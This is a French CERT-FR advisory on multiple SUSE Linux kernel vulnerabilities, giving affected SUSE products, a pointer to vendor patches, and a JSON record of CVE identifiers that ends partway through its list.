Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CERTFR-2024-AVI-0840
Vulnerability from certfr_avis
De multiples vulnérabilités ont été découvertes dans le noyau Linux de SUSE. Certaines d'entre elles permettent à un attaquant de provoquer une élévation de privilèges, une atteinte à la confidentialité des données et une atteinte à l'intégrité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
NoneImpacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| SUSE | N/A | Legacy Module 15-SP5 | ||
| SUSE | N/A | openSUSE Leap Micro 5.5 | ||
| SUSE | N/A | SUSE Linux Enterprise High Performance Computing 15 SP5 | ||
| SUSE | N/A | SUSE Linux Enterprise Server for SAP Applications 15 SP2 | ||
| SUSE | N/A | SUSE Linux Enterprise Server 15 SP2 LTSS 15-SP2 | ||
| SUSE | N/A | SUSE Linux Enterprise Desktop 15 SP5 | ||
| SUSE | N/A | SUSE Linux Enterprise Server 11 SP4 LTSS EXTREME CORE 11-SP4 | ||
| SUSE | N/A | SUSE Linux Enterprise High Availability Extension 15 SP5 | ||
| SUSE | N/A | SUSE Linux Enterprise Server 11 SP4 | ||
| SUSE | N/A | SUSE Linux Enterprise Live Patching 15-SP2 | ||
| SUSE | N/A | SUSE Linux Enterprise High Performance Computing 15 SP2 LTSS 15-SP2 | ||
| SUSE | N/A | openSUSE Leap 15.5 | ||
| SUSE | N/A | SUSE Manager Retail Branch Server 4.1 | ||
| SUSE | N/A | SUSE Linux Enterprise High Performance Computing 15 SP2 | ||
| SUSE | N/A | SUSE Linux Enterprise Live Patching 15-SP6 | ||
| SUSE | N/A | SUSE Linux Enterprise Server 15 SP5 | ||
| SUSE | N/A | SUSE Linux Enterprise Server for SAP Applications 15 SP5 | ||
| SUSE | N/A | SUSE Linux Enterprise Real Time 15 SP5 | ||
| SUSE | N/A | SUSE Linux Enterprise Live Patching 15-SP5 | ||
| SUSE | N/A | SUSE Manager Server 4.1 | ||
| SUSE | N/A | SUSE Linux Enterprise Real Time 15 SP6 | ||
| SUSE | N/A | openSUSE Leap 15.6 | ||
| SUSE | N/A | SUSE Linux Enterprise High Availability Extension 15 SP2 | ||
| SUSE | N/A | SUSE Linux Enterprise Server 15 SP2 Business Critical Linux 15-SP2 | ||
| SUSE | N/A | SUSE Manager Proxy 4.1 | ||
| SUSE | N/A | Basesystem Module 15-SP5 | ||
| SUSE | N/A | SUSE Linux Enterprise Workstation Extension 15 SP5 | ||
| SUSE | N/A | Development Tools Module 15-SP5 | ||
| SUSE | N/A | SUSE Linux Enterprise Server 15 SP2 | ||
| SUSE | N/A | SUSE Linux Enterprise Server for SAP Applications 15 SP6 | ||
| SUSE | N/A | SUSE Linux Enterprise Server 15 SP6 | ||
| SUSE | N/A | SUSE Linux Enterprise Micro 5.5 |
References
| Title | Publication Time | Tags | ||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Legacy Module 15-SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "openSUSE Leap Micro 5.5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Performance Computing 15 SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server for SAP Applications 15 SP2",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 15 SP2 LTSS 15-SP2",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Desktop 15 SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 11 SP4 LTSS EXTREME CORE 11-SP4",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Availability Extension 15 SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 11 SP4",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Live Patching 15-SP2",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Performance Computing 15 SP2 LTSS 15-SP2",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "openSUSE Leap 15.5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Manager Retail Branch Server 4.1",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Performance Computing 15 SP2",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Live Patching 15-SP6",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 15 SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Real Time 15 SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Live Patching 15-SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Manager Server 4.1",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Real Time 15 SP6",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "openSUSE Leap 15.6",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Availability Extension 15 SP2",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 15 SP2 Business Critical Linux 15-SP2",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Manager Proxy 4.1",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "Basesystem Module 15-SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Workstation Extension 15 SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "Development Tools Module 15-SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 15 SP2",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server for SAP Applications 15 SP6",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 15 SP6",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Micro 5.5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2021-4204",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-4204"
},
{
"name": "CVE-2022-23222",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23222"
},
{
"name": "CVE-2022-20368",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-20368"
},
{
"name": "CVE-2022-0854",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0854"
},
{
"name": "CVE-2022-2964",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2964"
},
{
"name": "CVE-2022-28748",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-28748"
},
{
"name": "CVE-2022-0500",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0500"
},
{
"name": "CVE-2022-4382",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-4382"
},
{
"name": "CVE-2023-1582",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1582"
},
{
"name": "CVE-2023-2176",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2176"
},
{
"name": "CVE-2023-3610",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3610"
},
{
"name": "CVE-2022-40133",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40133"
},
{
"name": "CVE-2022-38457",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-38457"
},
{
"name": "CVE-2023-52458",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52458"
},
{
"name": "CVE-2024-26631",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26631"
},
{
"name": "CVE-2024-26584",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26584"
},
{
"name": "CVE-2024-26800",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26800"
},
{
"name": "CVE-2024-26583",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26583"
},
{
"name": "CVE-2024-26735",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26735"
},
{
"name": "CVE-2024-26812",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26812"
},
{
"name": "CVE-2023-52581",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52581"
},
{
"name": "CVE-2023-52489",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52489"
},
{
"name": "CVE-2023-52498",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52498"
},
{
"name": "CVE-2024-27016",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27016"
},
{
"name": "CVE-2024-26808",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26808"
},
{
"name": "CVE-2024-26835",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26835"
},
{
"name": "CVE-2024-27024",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27024"
},
{
"name": "CVE-2024-26851",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26851"
},
{
"name": "CVE-2024-26668",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26668"
},
{
"name": "CVE-2024-26669",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26669"
},
{
"name": "CVE-2022-48686",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48686"
},
{
"name": "CVE-2024-36929",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36929"
},
{
"name": "CVE-2024-36933",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36933"
},
{
"name": "CVE-2023-52854",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52854"
},
{
"name": "CVE-2024-35945",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35945"
},
{
"name": "CVE-2024-35971",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35971"
},
{
"name": "CVE-2024-36009",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36009"
},
{
"name": "CVE-2024-36013",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36013"
},
{
"name": "CVE-2024-36936",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36936"
},
{
"name": "CVE-2024-31076",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-31076"
},
{
"name": "CVE-2024-35897",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35897"
},
{
"name": "CVE-2024-35902",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35902"
},
{
"name": "CVE-2024-36286",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36286"
},
{
"name": "CVE-2024-27403",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27403"
},
{
"name": "CVE-2024-27079",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27079"
},
{
"name": "CVE-2023-52846",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52846"
},
{
"name": "CVE-2024-26677",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26677"
},
{
"name": "CVE-2024-27010",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27010"
},
{
"name": "CVE-2024-27011",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27011"
},
{
"name": "CVE-2024-36270",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36270"
},
{
"name": "CVE-2024-36489",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36489"
},
{
"name": "CVE-2024-38662",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38662"
},
{
"name": "CVE-2024-39489",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39489"
},
{
"name": "CVE-2024-40905",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-40905"
},
{
"name": "CVE-2024-40978",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-40978"
},
{
"name": "CVE-2024-40980",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-40980"
},
{
"name": "CVE-2024-40995",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-40995"
},
{
"name": "CVE-2024-41000",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41000"
},
{
"name": "CVE-2024-36962",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36962"
},
{
"name": "CVE-2024-38554",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38554"
},
{
"name": "CVE-2024-38602",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38602"
},
{
"name": "CVE-2022-48808",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48808"
},
{
"name": "CVE-2024-41011",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41011"
},
{
"name": "CVE-2021-47546",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-47546"
},
{
"name": "CVE-2022-48791",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48791"
},
{
"name": "CVE-2022-48802",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48802"
},
{
"name": "CVE-2022-48805",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48805"
},
{
"name": "CVE-2022-48839",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48839"
},
{
"name": "CVE-2022-48853",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48853"
},
{
"name": "CVE-2024-40909",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-40909"
},
{
"name": "CVE-2024-41009",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41009"
},
{
"name": "CVE-2024-41016",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41016"
},
{
"name": "CVE-2024-41060",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41060"
},
{
"name": "CVE-2024-41087",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41087"
},
{
"name": "CVE-2024-41089",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41089"
},
{
"name": "CVE-2024-41095",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41095"
},
{
"name": "CVE-2024-42119",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42119"
},
{
"name": "CVE-2024-42120",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42120"
},
{
"name": "CVE-2024-42223",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42223"
},
{
"name": "CVE-2024-42230",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42230"
},
{
"name": "CVE-2024-41007",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41007"
},
{
"name": "CVE-2024-41020",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41020"
},
{
"name": "CVE-2024-41022",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41022"
},
{
"name": "CVE-2024-41035",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41035"
},
{
"name": "CVE-2024-41065",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41065"
},
{
"name": "CVE-2024-41068",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41068"
},
{
"name": "CVE-2024-42101",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42101"
},
{
"name": "CVE-2024-42104",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42104"
},
{
"name": "CVE-2024-42106",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42106"
},
{
"name": "CVE-2024-42115",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42115"
},
{
"name": "CVE-2024-42121",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42121"
},
{
"name": "CVE-2024-42127",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42127"
},
{
"name": "CVE-2024-42137",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42137"
},
{
"name": "CVE-2024-42143",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42143"
},
{
"name": "CVE-2024-42148",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42148"
},
{
"name": "CVE-2024-42152",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42152"
},
{
"name": "CVE-2024-42157",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42157"
},
{
"name": "CVE-2024-42229",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42229"
},
{
"name": "CVE-2024-42232",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42232"
},
{
"name": "CVE-2024-42236",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42236"
},
{
"name": "CVE-2024-42244",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42244"
},
{
"name": "CVE-2024-42247",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42247"
},
{
"name": "CVE-2024-42110",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42110"
},
{
"name": "CVE-2024-41073",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41073"
},
{
"name": "CVE-2024-42082",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42082"
},
{
"name": "CVE-2023-52887",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52887"
},
{
"name": "CVE-2024-41092",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41092"
},
{
"name": "CVE-2024-41093",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41093"
},
{
"name": "CVE-2024-41097",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41097"
},
{
"name": "CVE-2024-42076",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42076"
},
{
"name": "CVE-2024-42077",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42077"
},
{
"name": "CVE-2024-42080",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42080"
},
{
"name": "CVE-2024-42085",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42085"
},
{
"name": "CVE-2024-42086",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42086"
},
{
"name": "CVE-2024-42087",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42087"
},
{
"name": "CVE-2024-42089",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42089"
},
{
"name": "CVE-2024-42090",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42090"
},
{
"name": "CVE-2024-42092",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42092"
},
{
"name": "CVE-2024-42095",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42095"
},
{
"name": "CVE-2024-42097",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42097"
},
{
"name": "CVE-2024-42098",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42098"
},
{
"name": "CVE-2024-42130",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42130"
},
{
"name": "CVE-2024-42225",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42225"
},
{
"name": "CVE-2024-42240",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42240"
},
{
"name": "CVE-2021-4441",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-4441"
},
{
"name": "CVE-2021-47106",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-47106"
},
{
"name": "CVE-2021-47517",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-47517"
},
{
"name": "CVE-2022-48645",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48645"
},
{
"name": "CVE-2022-48706",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48706"
},
{
"name": "CVE-2022-48865",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48865"
},
{
"name": "CVE-2022-48868",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48868"
},
{
"name": "CVE-2022-48869",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48869"
},
{
"name": "CVE-2022-48870",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48870"
},
{
"name": "CVE-2022-48871",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48871"
},
{
"name": "CVE-2022-48872",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48872"
},
{
"name": "CVE-2022-48873",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48873"
},
{
"name": "CVE-2022-48875",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48875"
},
{
"name": "CVE-2022-48878",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48878"
},
{
"name": "CVE-2022-48880",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48880"
},
{
"name": "CVE-2022-48881",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48881"
},
{
"name": "CVE-2022-48882",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48882"
},
{
"name": "CVE-2022-48883",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48883"
},
{
"name": "CVE-2022-48884",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48884"
},
{
"name": "CVE-2022-48885",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48885"
},
{
"name": "CVE-2022-48886",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48886"
},
{
"name": "CVE-2022-48887",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48887"
},
{
"name": "CVE-2022-48888",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48888"
},
{
"name": "CVE-2022-48889",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48889"
},
{
"name": "CVE-2022-48890",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48890"
},
{
"name": "CVE-2022-48891",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48891"
},
{
"name": "CVE-2022-48893",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48893"
},
{
"name": "CVE-2022-48896",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48896"
},
{
"name": "CVE-2022-48898",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48898"
},
{
"name": "CVE-2022-48899",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48899"
},
{
"name": "CVE-2022-48901",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48901"
},
{
"name": "CVE-2022-48903",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48903"
},
{
"name": "CVE-2022-48904",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48904"
},
{
"name": "CVE-2022-48905",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48905"
},
{
"name": "CVE-2022-48906",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48906"
},
{
"name": "CVE-2022-48907",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48907"
},
{
"name": "CVE-2022-48909",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48909"
},
{
"name": "CVE-2022-48910",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48910"
},
{
"name": "CVE-2022-48912",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48912"
},
{
"name": "CVE-2022-48913",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48913"
},
{
"name": "CVE-2022-48914",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48914"
},
{
"name": "CVE-2022-48915",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48915"
},
{
"name": "CVE-2022-48916",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48916"
},
{
"name": "CVE-2022-48917",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48917"
},
{
"name": "CVE-2022-48918",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48918"
},
{
"name": "CVE-2022-48919",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48919"
},
{
"name": "CVE-2022-48920",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48920"
},
{
"name": "CVE-2022-48921",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48921"
},
{
"name": "CVE-2022-48923",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48923"
},
{
"name": "CVE-2022-48924",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48924"
},
{
"name": "CVE-2022-48925",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48925"
},
{
"name": "CVE-2022-48926",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48926"
},
{
"name": "CVE-2022-48927",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48927"
},
{
"name": "CVE-2022-48928",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48928"
},
{
"name": "CVE-2022-48929",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48929"
},
{
"name": "CVE-2022-48930",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48930"
},
{
"name": "CVE-2022-48931",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48931"
},
{
"name": "CVE-2022-48932",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48932"
},
{
"name": "CVE-2022-48934",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48934"
},
{
"name": "CVE-2022-48937",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48937"
},
{
"name": "CVE-2022-48938",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48938"
},
{
"name": "CVE-2022-48939",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48939"
},
{
"name": "CVE-2022-48940",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48940"
},
{
"name": "CVE-2022-48941",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48941"
},
{
"name": "CVE-2022-48942",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48942"
},
{
"name": "CVE-2022-48943",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48943"
},
{
"name": "CVE-2023-52859",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52859"
},
{
"name": "CVE-2023-52889",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52889"
},
{
"name": "CVE-2023-52893",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52893"
},
{
"name": "CVE-2023-52894",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52894"
},
{
"name": "CVE-2023-52896",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52896"
},
{
"name": "CVE-2023-52898",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52898"
},
{
"name": "CVE-2023-52899",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52899"
},
{
"name": "CVE-2023-52900",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52900"
},
{
"name": "CVE-2023-52901",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52901"
},
{
"name": "CVE-2023-52904",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52904"
},
{
"name": "CVE-2023-52905",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52905"
},
{
"name": "CVE-2023-52906",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52906"
},
{
"name": "CVE-2023-52907",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52907"
},
{
"name": "CVE-2023-52908",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52908"
},
{
"name": "CVE-2023-52909",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52909"
},
{
"name": "CVE-2023-52910",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52910"
},
{
"name": "CVE-2023-52911",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52911"
},
{
"name": "CVE-2023-52912",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52912"
},
{
"name": "CVE-2023-52913",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52913"
},
{
"name": "CVE-2024-41036",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41036"
},
{
"name": "CVE-2024-41038",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41038"
},
{
"name": "CVE-2024-41039",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41039"
},
{
"name": "CVE-2024-41042",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41042"
},
{
"name": "CVE-2024-41045",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41045"
},
{
"name": "CVE-2024-41056",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41056"
},
{
"name": "CVE-2024-41062",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41062"
},
{
